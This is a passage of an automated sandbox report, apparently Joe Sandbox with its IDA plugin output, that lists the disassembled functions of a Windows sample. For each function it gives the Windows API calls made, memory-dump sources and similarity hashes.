Part of subcall function 00007FF7A51A2A54: GetWindowLongPtrW.USER32 ref: 00007FF7A51A2A71

GetCursorPos.USER32 ref: 00007FF7A52510E1
TrackPopupMenuEx.USER32 ref: 00007FF7A5251105
GetCursorPos.USER32(?,?,00000000,?,?,00007FF7A51EAB30,?,?,?,?,?,?,?,?,?,00007FF7A51A27AF), ref: 00007FF7A525114C
DefDlgProcW.USER32(?,?,00000000,?,?,00007FF7A51EAB30,?,?,?,?,?,?,?,?,?,00007FF7A51A27AF), ref: 00007FF7A5251190

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
Instruction ID: 1772ca4fd624f975a928dddc9b49989f68cc62bae6315e14f90846ec78f191d0
Opcode Fuzzy Hash: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
Instruction Fuzzy Hash: 8B316166A09A4581EB10EB15E8543B9F360FB85F94F954131EA8D43BBCCF3CD545C710

Function 00007FF7A52150E4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A521691C: lstrlenW.KERNEL32 ref: 00007FF7A5216944
Part of subcall function 00007FF7A521691C: lstrcpyW.KERNEL32 ref: 00007FF7A5216973
Part of subcall function 00007FF7A521691C: lstrcmpiW.KERNEL32 ref: 00007FF7A52169AD

lstrlenW.KERNEL32 ref: 00007FF7A5215127
lstrcpyW.KERNEL32 ref: 00007FF7A521515A
lstrcmpiW.KERNEL32 ref: 00007FF7A521519C

Strings

cdecl, xrefs: 00007FF7A5215191

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 9543eb87236cbe86fa524af2d72e3452b2187adb33a089d16778c3ede46c2dfa
Instruction ID: a77fdd2b109d6a61216c36b0451ea406503abdeec8644e2db0bedcc0d309d383
Opcode Fuzzy Hash: 9543eb87236cbe86fa524af2d72e3452b2187adb33a089d16778c3ede46c2dfa
Instruction Fuzzy Hash: DF21E1B170A38186EA24AF15EC50179B361FF9AF90B8A4134EB5E473E8EF3DE4408314

Function 00007FF7A520D6A0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A520CAB4: GetTokenInformation.ADVAPI32 ref: 00007FF7A520CAE6
Part of subcall function 00007FF7A520CAB4: GetLastError.KERNEL32 ref: 00007FF7A520CAF2
Part of subcall function 00007FF7A520CAB4: GetProcessHeap.KERNEL32 ref: 00007FF7A520CAFF
Part of subcall function 00007FF7A520CAB4: HeapAlloc.KERNEL32 ref: 00007FF7A520CB0E
Part of subcall function 00007FF7A520CAB4: GetTokenInformation.ADVAPI32 ref: 00007FF7A520CB2D

GetLengthSid.ADVAPI32 ref: 00007FF7A520D71A
CopySid.ADVAPI32 ref: 00007FF7A520D73F
GetProcessHeap.KERNEL32 ref: 00007FF7A520D754
HeapFree.KERNEL32 ref: 00007FF7A520D762

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
String ID:
API String ID: 837644225-0
Opcode ID: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
Instruction ID: 6b7140a2690a733f436fc186ec39ad3c627a114f302a45cfdba28bb97ded400d
Opcode Fuzzy Hash: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
Instruction Fuzzy Hash: 2921BFB6A17A4186EB04EF21E804778A3A5FB89F91F864139CA0D437A8DF3DE841C750

Function 00007FF7A5252264 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A2A54: GetWindowLongPtrW.USER32 ref: 00007FF7A51A2A71

GetClientRect.USER32(?,?,?,?,?,00007FF7A51EAA36,?,?,?,?,?,?,?,?,?,00007FF7A51A27AF), ref: 00007FF7A52522C4
GetCursorPos.USER32(?,?,?,?,?,00007FF7A51EAA36,?,?,?,?,?,?,?,?,?,00007FF7A51A27AF), ref: 00007FF7A52522CF
ScreenToClient.USER32 ref: 00007FF7A52522DD
DefDlgProcW.USER32(?,?,?,?,?,00007FF7A51EAA36,?,?,?,?,?,?,?,?,?,00007FF7A51A27AF), ref: 00007FF7A525231F

Part of subcall function 00007FF7A524E894: LoadCursorW.USER32 ref: 00007FF7A524E945

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ClientCursor$LoadLongProcRectScreenWindow
String ID:
API String ID: 1626762757-0
Opcode ID: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
Instruction ID: 390179f55fd89123b7a399a690aa9e9697e8222ca1d373fb01729beb28db5c3e
Opcode Fuzzy Hash: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
Instruction Fuzzy Hash: 0D213C66A0964696EA24EB05E880169B3A0FB96F80F950131EB4D47BEDDF3CE941C720

Function 00007FF7A51A932C Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00007FF7A51A93BC
GetStockObject.GDI32 ref: 00007FF7A51A93D9
SendMessageW.USER32 ref: 00007FF7A51A93EC

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
Instruction ID: 325aaa78b91cb348ff801f17915c2072d42da7e864b7139621b5e2aa9f6f4004
Opcode Fuzzy Hash: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
Instruction Fuzzy Hash: 452160726197C58AE7659B25F8447AAB7A0FB89B80F840135DB8D47BA8DF7CD484CB00

Function 00007FF7A521CF68 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF7A521CFA7

Part of subcall function 00007FF7A51D1F44: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51D1F68

MessageBoxW.USER32 ref: 00007FF7A521CFEA
WaitForSingleObject.KERNEL32 ref: 00007FF7A521D004
CloseHandle.KERNEL32 ref: 00007FF7A521D00D

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
String ID:
API String ID: 2979156933-0
Opcode ID: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
Instruction ID: 2863944939a5e6e2bc62753770fe0f5c1efd0fe2b7bdcf92b24534d11e5327bc
Opcode Fuzzy Hash: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
Instruction Fuzzy Hash: 4B2101B2A097818AE710AF26BC402AAF691BB96FD0F854135E98D43BB9CF3CD4058750

Function 00007FF7A51D2FB8 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

_ctrlfp.LIBCMT ref: 00007FF7A51D2FE5
_ctrlfp.LIBCMT ref: 00007FF7A51D3039
_ctrlfp.LIBCMT ref: 00007FF7A51D304D
_ctrlfp.LIBCMT ref: 00007FF7A51D3071

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _ctrlfp
String ID:
API String ID: 697997973-0
Opcode ID: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
Instruction ID: 169f11b7f4942883b941e8ad6b0c2211c3e49b81debb77dfc8e95ed1481017e0
Opcode Fuzzy Hash: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
Instruction Fuzzy Hash: EB11C923D0E54581E612EA38F44117BD371EF9BF80FA54231FB89466BDDE2DE540CA50

Function 00007FF7A524FA78 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00007FF7A524FAA8
ScreenToClient.USER32 ref: 00007FF7A524FAC1
ScreenToClient.USER32 ref: 00007FF7A524FAE6
InvalidateRect.USER32 ref: 00007FF7A524FB02

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
Instruction ID: 15a8709e48faf652f49f6e49724968962cd86382fe9d3a949cc4d2a8502a1e63
Opcode Fuzzy Hash: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
Instruction Fuzzy Hash: 2121F7B6B05741DEEB00DF74D8441AC77B0F749B48B404826EA5893B6CEB78D654CB50

Function 00007FF7A5214B28 Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF7A5214B47
LoadTypeLibEx.OLEAUT32 ref: 00007FF7A5214B62
RegisterTypeLib.OLEAUT32 ref: 00007FF7A5214B77
RegisterTypeLibForUser.OLEAUT32 ref: 00007FF7A5214B95

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
Instruction ID: e99087ce4e34ceb36c3f0f9ee28ed2b170420284c1eddbfe6d138be5813ddc0d
Opcode Fuzzy Hash: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
Instruction Fuzzy Hash: 541186B1B1954282E7209F14ED9436AA3A0FB85F48F964035C64D4B5ECCF7ED644CB60

Function 00007FF7A51DB778 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7A51C8DD0,?,?,0x%p,00007FF7A51CD8ED), ref: 00007FF7A51DB782
SetLastError.KERNEL32(?,?,?,00007FF7A51C8DD0,?,?,0x%p,00007FF7A51CD8ED), ref: 00007FF7A51DB7EA
SetLastError.KERNEL32(?,?,?,00007FF7A51C8DD0,?,?,0x%p,00007FF7A51CD8ED), ref: 00007FF7A51DB800
abort.LIBCMT ref: 00007FF7A51DB806

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ErrorLast$abort
String ID:
API String ID: 1447195878-0
Opcode ID: cad25cac9c97b8d08bbafe1a1b7dd58d6189f7d4eecb4e23cc57ccc73cc2708c
Instruction ID: 40d10350b29447020b435d1a680d6bb6bb78e8d89045fa91f6c48904d4d3d6e9
Opcode Fuzzy Hash: cad25cac9c97b8d08bbafe1a1b7dd58d6189f7d4eecb4e23cc57ccc73cc2708c
Instruction Fuzzy Hash: F8018C26B0B64242FA9AB771F99553D91515F4AF90FD61538D90F027FEDD2CF8044A20

Function 00007FF7A5219260 Relevance: 6.0, APIs: 4, Instructions: 37sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32 ref: 00007FF7A5219283
Sleep.KERNEL32 ref: 00007FF7A5219297
QueryPerformanceCounter.KERNEL32 ref: 00007FF7A52192A2
Sleep.KERNEL32 ref: 00007FF7A52192CD

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
Instruction ID: a0008e8a555d4a22186e1e2dd9c88f2a115bb4c3af4af9cd43517383b88c1b91
Opcode Fuzzy Hash: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
Instruction Fuzzy Hash: 1601FEA0B0DB4642E61667349C4017BF350BF96F41F860335E94F555F8CF2DE485C610

Function 00007FF7A525072C Relevance: 6.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A2370: ExtCreatePen.GDI32 ref: 00007FF7A51A23FF
Part of subcall function 00007FF7A51A2370: SelectObject.GDI32 ref: 00007FF7A51A2412
Part of subcall function 00007FF7A51A2370: BeginPath.GDI32 ref: 00007FF7A51A242B
Part of subcall function 00007FF7A51A2370: SelectObject.GDI32 ref: 00007FF7A51A2452

MoveToEx.GDI32 ref: 00007FF7A5250771
LineTo.GDI32 ref: 00007FF7A5250783
EndPath.GDI32 ref: 00007FF7A5250795
StrokePath.GDI32 ref: 00007FF7A52507A5

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
Instruction ID: 4cec56d71a40071ab771ab868fc77eda5e1125b7dcd6ef85519e4eab5bfca384
Opcode Fuzzy Hash: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
Instruction Fuzzy Hash: C101C075B1929182E7009B26BC08728AF60AB82F90F994134DE5903BB9CF7EE8408B10

Function 00007FF7A520D4EC Relevance: 6.0, APIs: 4, Instructions: 24threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00007FF7A520D4F6
OpenThreadToken.ADVAPI32(?,?,00000000,00007FF7A520CC94), ref: 00007FF7A520D509
GetCurrentProcess.KERNEL32(?,?,00000000,00007FF7A520CC94), ref: 00007FF7A520D513
OpenProcessToken.ADVAPI32(?,?,00000000,00007FF7A520CC94), ref: 00007FF7A520D524

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
Instruction ID: 353d180ee46268a35fe6585b94bd7ab88a0f3dcc43f97e24f223a4f557e66748
Opcode Fuzzy Hash: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
Instruction Fuzzy Hash: DBF065A1B1B94283FB506F61EC4476963E0AF6AF95FC94034C90E422A8DF3D99898310

Function 00007FF7A520326E Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00007FF7A520326E
GetDC.USER32 ref: 00007FF7A520327A
GetDeviceCaps.GDI32 ref: 00007FF7A52032A4
ReleaseDC.USER32 ref: 00007FF7A52032C5

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
Instruction ID: ce6cfbc1ce11b28b2323488785b0c699479e760a88d6a8eda126ed6648cd0f90
Opcode Fuzzy Hash: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
Instruction Fuzzy Hash: ADE012A1B1B70286F600EB61AC0C1389254AF56FD1F834034CD0E03BBDDE3D64058310

Function 00007FF7A5203287 Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00007FF7A5203287
GetDC.USER32 ref: 00007FF7A5203293
GetDeviceCaps.GDI32 ref: 00007FF7A52032A4
ReleaseDC.USER32 ref: 00007FF7A52032C5

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
Instruction ID: 3022d411eb4c62273e7d265d275dc22ffa85ab5937509c8ec3546eb1de0709aa
Opcode Fuzzy Hash: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
Instruction Fuzzy Hash: E0E04FA1F1B70286EA00EB61AC0C138A254AF5BFD2F824034CD0E03BB9EE3EA0058310

Function 00007FF7A51DCC78 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51DCCDC

Strings

gfffffff, xrefs: 00007FF7A51DCF6A

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: gfffffff
API String ID: 3215553584-1523873471
Opcode ID: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
Instruction ID: 77d0e66b2083769af5d829dd62d9f78f5b14761ddf81017848cb1cc510f2ccdc
Opcode Fuzzy Hash: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
Instruction Fuzzy Hash: 4C914B63A0B78685EB129F29E1403B8EB55AB16FC4F458531DB8D073AADE3DE142C311

Function 00007FF7A5211D10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32 ref: 00007FF7A5211F50

Strings

Container, xrefs: 00007FF7A5211E83
